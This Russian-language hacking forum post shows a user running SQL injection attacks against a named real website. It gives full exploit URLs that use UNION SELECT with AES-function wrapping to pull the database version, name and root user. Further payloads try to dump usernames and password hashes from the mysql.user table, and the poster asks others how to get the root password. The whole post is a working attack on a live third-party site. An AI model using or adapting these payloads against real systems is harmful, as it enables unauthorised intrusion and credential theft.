|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
С нами:
10194175
Репутация:
524
|
|
brahms.ro
Код:
http://www.brahms.ro/produse/detalii.php?cat=15&sub=72&produs=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,aes_decrypt(aes_encrypt(version(),0x71),0x71),aes_decrypt(aes_encrypt(database(),0x71),0x71),aes_decrypt(aes_encrypt(user(),0x71),0x71)),11,12,13/*
4.1.12:b2:root@localhost
А дальше нужна подсказка...
Почему-то можно посмотреть user из mysql.user:
Код:
http://www.brahms.ro/produse/detalii.php?cat=15&sub=72&produs=-1+union+select+1,2,3,4,5,6,7,8,9,aes_decrypt(aes_encrypt(user,0x71),0x71),11,12,13+from+mysql.user+limit+1,1/*
но ничего не отображается в поле password:
Код:
http://www.brahms.ro/produse/detalii.php?cat=15&sub=72&produs=-1+union+select+1,2,3,4,5,6,7,8,9,aes_decrypt(aes_encrypt(password,0x71),0x71),11,12,13+from+mysql.user+limit+1,1/*
неужели нет пароля на рута..?!
|